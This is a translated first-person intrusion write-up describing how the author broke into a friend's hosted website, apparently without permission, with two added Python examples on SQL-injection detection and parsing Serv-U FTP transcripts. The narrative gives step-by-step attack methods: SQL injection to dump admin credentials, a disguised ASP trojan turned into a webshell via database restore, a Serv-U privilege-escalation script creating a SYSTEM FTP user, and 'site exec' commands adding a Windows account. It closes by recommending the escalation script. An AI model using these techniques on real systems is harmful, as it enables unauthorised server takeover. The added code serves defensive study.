Serv-U.php: light in the dark

Source: Internet
Author: User

Things have been dull lately, with nothing to do, when a friend happened to launch a new website. Let me take a look and test its security.

First I looked at the site's structure and layout. The whole thing felt like an off-the-shelf package; looking more closely, I guessed FreePower 3.6, which I know reasonably well. The site's forum is LeadBBS. Reconnaissance done, time to get to work!

TIPS: gathering information before an intrusion is very important; it decides the approach you take and the order of your steps.

I pinged the target to get its IP address. Opening the bare IP in IE brought up a different site, so this is most likely a virtual host. A reverse lookup at http://whois.webhosting.info showed 78 domain names bound to this IP. That is a lot. Browsing the other sites, most are ASP and a few are PHP. I had thought about attacking through one of the neighbouring sites, but my skills are limited and my fundamentals weak, so I did not pursue it.

First, I found this link on the site:

http://www.xxxxx.com/Article_Show.asp?ArticleID=7

It looked promising. Appending a semicolon to the ArticleID produced an error page; replacing it with a dot gave the normal page. That difference means the parameter is being spliced straight into the SQL text, i.e. there is probably a SQL injection vulnerability. I used a tool for the injection: opened NBSI 2 (nb_2), entered the injection URL, and the automatic check reported no vulnerability. I then filled in a feature string (text the tool looks for in the normal response to tell true from false) and re-ran the check, which this time found the injection point,

and in turn dumped the admin username and the MD5 hash of the password. Cracking the hash gave the password kignpl.
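The differential check above generalizes: a parameter spliced into the query text reacts differently to two appended characters, one that breaks the SQL and one that is still valid SQL, whereas a validated, parameterized query treats every non-numeric value the same way. The Python below is an added example, not code from the original article or from the FreePower package. It uses SQLite, which accepts a trailing semicolon, so the error-producing suffix here is a single quote rather than the semicolon used above; the Article table, its rows and the probe payloads are constructed for the demo.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's article table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Article (ArticleID INTEGER PRIMARY KEY, Title TEXT)")
    conn.executemany("INSERT INTO Article VALUES (?, ?)",
                     [(7, "first article"), (8, "second article")])
    return conn


def show_article_vulnerable(conn, article_id):
    """Splices the request parameter into the SQL text (the 2005 ASP habit)."""
    sql = "SELECT Title FROM Article WHERE ArticleID=" + article_id
    return conn.execute(sql).fetchall()


def show_article_fixed(conn, article_id):
    """Rejects non-integers up front and binds the value as a parameter."""
    if not article_id.isdigit():
        raise ValueError("ArticleID must be a positive integer")
    sql = "SELECT Title FROM Article WHERE ArticleID=?"
    return conn.execute(sql, (int(article_id),)).fetchall()


def probe(handler, conn, payloads):
    """Record 'ok', 'empty' or the exception class name for each payload.

    A handler that errors on one suffix but answers normally on another is
    parsing the suffix as SQL; a handler that rejects every non-numeric value
    the same way is not.
    """
    results = {}
    for payload in payloads:
        try:
            rows = handler(conn, payload)
            results[payload] = "ok" if rows else "empty"
        except Exception as exc:  # sqlite3.OperationalError or ValueError
            results[payload] = type(exc).__name__
    return results


# "7'" breaks the SQL the way "7;" did against the article's Access backend;
# "7." is still a valid numeric literal; the AND pairs are the boolean check.
PAYLOADS = ["7", "7.", "7'", "7 AND 1=1", "7 AND 1=2"]


def run():
    conn = make_db()
    return {
        "vulnerable": probe(show_article_vulnerable, conn, PAYLOADS),
        "fixed": probe(show_article_fixed, conn, PAYLOADS),
    }


if __name__ == "__main__":
    for name, outcome in run().items():
        print(name, outcome)
```

Against the vulnerable handler, `7.` and `7 AND 1=1` behave like `7`, `7'` raises a database error and `7 AND 1=2` returns nothing, which is exactly the signal an injection tool keys on; against the fixed handler every payload except `7` is rejected before any SQL runs.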

The backend login address was right on the home page, so there was no need to hunt for it. Once inside I set about getting my ASP trojan up, going through each function carefully. The upload/file management module could not be used, but article management could. Locally I renamed the Haiyang 2005 ASP trojan to a .gif file and uploaded it through article management; on success it reported the file's relative path as "uploadfiles/2005-2/2005217193345303.gif". But how to turn that into an ASP file? Stuck again, and gloomy! Then I remembered Yu Yi's write-up on using the database backup/restore function to get around DVBBS not allowing ASP uploads: point the backup function at the uploaded file as its source and give an .asp name as the destination. Exactly what I needed. I found the database management section and restored the uploaded GIF to an ASP file.

The trojan was now at http://www.xxxxx.com/database/8.asp. Some progress at last. I logged into my beloved ASP trojan and had a webshell. Host information at a glance: IIS 6.0, Windows Server 2003, and, to my delight, FSO is supported. A first for me!

TIPS: FSO (File System Object) is Microsoft's file-handling component for ASP. It can read, create, modify and delete directories and files on the server, which makes it very handy in ASP programming, and equally handy in a webshell, which is why hardened hosts often disable it.

I had meant to stop there, but everyone else in the magazine escalates privileges, so let me join in. After poking around in the webshell for a while, I found that browsing the C drive was actually blocked by permissions: no CMD, no WSH, and no execute permission on the directory. How am I supposed to work with that......

Feeling down, I tried uploading again. I thought: you won't let me use CMD, I'll bring my own! Still failed. I uploaded an .exe disguised as 1.gif but could not change the extension afterwards; I couldn't even rename it to .htm. Frustrating: nothing can be run on this box. I nearly gave up. I could not write or read files outside the web directory, so the experts' usual tricks were out, reverse connections were out, never mind nc and a trojan.

Right, I hadn't checked the ports yet! I quickly ran SuperScan against the host, and the result was disheartening: only ports 21 and 389 were open, so the other side presumably has a firewall or TCP/IP filtering. Port 389 (LDAP) was unfamiliar to me. Port 21 is the default FTP port; how about connecting and grabbing the banner? Maybe it is Serv-U?

From the reply, the FTP server's banner had been changed, but the line "User name okay, need password." made me guess boldly that it was Serv-U. Bear in mind that this is also the standard 331 text given in RFC 959, so by itself it is weak evidence; the version banner seen later is what settled it. I still did not know the version, but there might be a few ways in. Let's try!

Thinking it over, there were two ways forward. The first: get in through one of the other sites on this IP. I refused to believe all 77 virtual hosts were locked down this tightly; some user should have more permissions. Easier said than done: it got dark, then it was the next day, and I had a pair of panda eyes to show for it. The second: Serv-U. Isn't that port 21? So I dug out my predecessors' remote overflow exploits and fired them one after another, but port 21 stood rock solid. Despair......

Then it struck me: doesn't the server support PHP (there is a PHP site on this IP)? My permissions are tiny but not zero. I can't upload an EXE, but a PHP file I can, and it parses fine. I quickly uploaded a PHP trojan. Unfortunately its permissions were just as low as the ASP trojan's, with almost nothing useful. But it gave me an idea: if a PHP script could carry out the Serv-U local privilege escalation, would that work? I don't know PHP and couldn't write it myself, so I searched online, without finding anything suitable. Later I mentioned the idea to Yu Yi, and he said he had exactly such a script. I took it and looked it over: precisely what I wanted. Haha, things were looking up.

I uploaded it to the web directory and renamed it to servu.php, at http://www.xxxxx.com/database/servu.php, then opened it directly in IE.

All we need is to add a super user to Serv-U! Usage: in Host IP, fill in the address of the virtual host's server; change the FTP management port if it is not the default; set the username and password as you like (the defaults are wofeiwo and wrsky); the user's home directory is C:\. Nothing else needs changing.

After changing the IP, username and password to suit my situation, I clicked Add. The Serv-U local privilege escalation script is parsed and executed on the server, which takes a little while. When the progress bar finished, the run had succeeded: a Serv-U user admim with password admim had been added, running with SYSTEM privileges, and the command echo appeared in the box. Mine was as follows (basically everything executed successfully):

220 Serv-u ftp Server v5.2 for WinSock ready...
331 User name okay, need password.
230 User logged in, proceed.
230-Switching to system maintenance mode.
230 Version = 1
900-Type = Status
900 Server = Online
900-Type = License
900-DaysLeft = 0
......
900 MinorVersion = 0
200-User = admim
200 User settings saved

Note that, since I could not see the real ports open behind the firewall (if there is one), I simply assumed the local Serv-U management port had not been changed, which was a bit of a gamble. Haha! It worked! And it is Serv-U 5.2: the version is even shown in the banner. Bullseye!

Now the picture is clear: log in over FTP with the new account, change directory to system32, and run the following to add a user: quote site exec net.exe user mdj 123456 /add

What's this? The command failed with an error:

ftp> quote site exec net.exe user mdj 123456 /add
501 Cannot EXEC command line (error = 0)

Thinking it over: net.exe certainly exists, so the administrator has probably restricted access to net.exe; a test with cmd.exe gave the same result. In that case, upload a copy of net.exe, name it 200.exe, and run the add-administrator command with that instead.

The command succeeded, which means it ran with system administrator privileges! From here you can manage the machine through Serv-U, upload whatever you need, and so on. Everyone here is an expert, so I won't belabor it; the penetration ends here.
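The two exchanges above (the management-mode echo and the SITE EXEC attempts) are ordinary FTP replies in RFC 959 format: a one-line reply is "NNN text", and a multi-line reply opens with "NNN-" and closes with a later "NNN " line carrying the same code; Serv-U's maintenance mode adds 900-series codes on top. The Python below is an added example, not code from the article, from the servu.php script or from Serv-U. It parses such a transcript and pulls out what an analyst reading a capture (or an attacker reading the echo) wants: the version from the 220 banner, whether the session switched to maintenance mode, which user records were saved, and each SITE EXEC with its result code. The transcript is constructed: the server lines reproduce the echo shown above, abridged; the client lines (marked with ">") and the text of the final 200 reply are assumed, and the credentials are redacted.

```python
import re

# Constructed transcript. Lines prefixed "> " are assumed client commands;
# the server lines follow the echo quoted in the article. The final "200"
# text is RFC 959's generic wording, assumed since the article shows none.
SESSION = """\
220 Serv-u ftp Server v5.2 for WinSock ready...
> USER (redacted)
331 User name okay, need password.
> PASS (redacted)
230 User logged in, proceed.
> SITE MAINTENANCE
230-Switching to system maintenance mode.
230 Version = 1
900-Type = Status
900 Server = Online
900-Type = License
900-DaysLeft = 0
900 MinorVersion = 0
> (user definition sent by the script; omitted here)
200-User = admim
200 User settings saved
> SITE EXEC net.exe user mdj 123456 /add
501 Cannot EXEC command line (error = 0)
> SITE EXEC 200.exe user mdj 123456 /add
200 Command okay.
"""

REPLY_RE = re.compile(r"^(\d{3})([ -])(.*)$")


def parse_session(text):
    """Split a transcript into ('cmd', text) and ('reply', code, lines) events.

    A multi-line reply (RFC 959 section 4.2) starts with "NNN-" and ends at
    the first later line that starts with the same NNN followed by a space;
    every line in between, coded or not, belongs to that reply.
    """
    events = []
    open_code, open_lines = None, None
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        if not line:
            continue
        if line.startswith("> "):
            events.append(("cmd", line[2:]))
            continue
        m = REPLY_RE.match(line)
        if open_code is not None:
            same_code = m is not None and m.group(1) == open_code
            open_lines.append(m.group(3) if same_code else line)
            if same_code and m.group(2) == " ":
                events.append(("reply", open_code, open_lines))
                open_code, open_lines = None, None
            continue
        if m is None:
            raise ValueError("unexpected line outside a reply: %r" % line)
        code, sep, rest = m.groups()
        if sep == "-":
            open_code, open_lines = code, [rest]
        else:
            events.append(("reply", code, [rest]))
    if open_code is not None:
        raise ValueError("unterminated multi-line reply %s" % open_code)
    return events


def summarize(events):
    """Extract version, maintenance-mode switch, saved users and SITE EXEC outcomes."""
    summary = {"version": None, "maintenance_mode": False,
               "users_saved": [], "site_exec": []}
    pending_cmd = None
    for ev in events:
        if ev[0] == "cmd":
            pending_cmd = ev[1]
            continue
        _, code, lines = ev
        text = "\n".join(lines)
        if code == "220":
            m = re.search(r"Serv-U FTP Server v(\d+\.\d+)", text, re.I)
            if m:
                summary["version"] = m.group(1)
        elif code == "230" and "maintenance mode" in text.lower():
            summary["maintenance_mode"] = True
        elif code == "200" and "User settings saved" in text:
            m = re.search(r"^User = (\S+)", text, re.M)
            if m:
                summary["users_saved"].append(m.group(1))
        if pending_cmd and pending_cmd.upper().startswith("SITE EXEC "):
            summary["site_exec"].append((pending_cmd[len("SITE EXEC "):], code))
        pending_cmd = None  # a reply answers the most recent command
    return summary


if __name__ == "__main__":
    for key, value in summarize(parse_session(SESSION)).items():
        print(key, "=", value)
```

On the constructed session this reports version 5.2, the switch into maintenance mode, one saved user (admim) and two SITE EXEC attempts, the first answered 501 and the second 200. The same two signals, a 230 reply announcing maintenance mode and any SITE EXEC on a host where Serv-U should never run commands, are worth alerting on in FTP server logs.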

This Serv-U.php works across Serv-U versions, and with nothing more than low user privileges on the web server it was this local privilege escalation tool that played the decisive role in the whole penetration. Some servers do allow programs to be executed; there you can simply upload the EXE version of the Serv-U escalation and run it. But if you meet the same or a similar situation in a web test, give this script a try; it may surprise you! Thank you for your support!
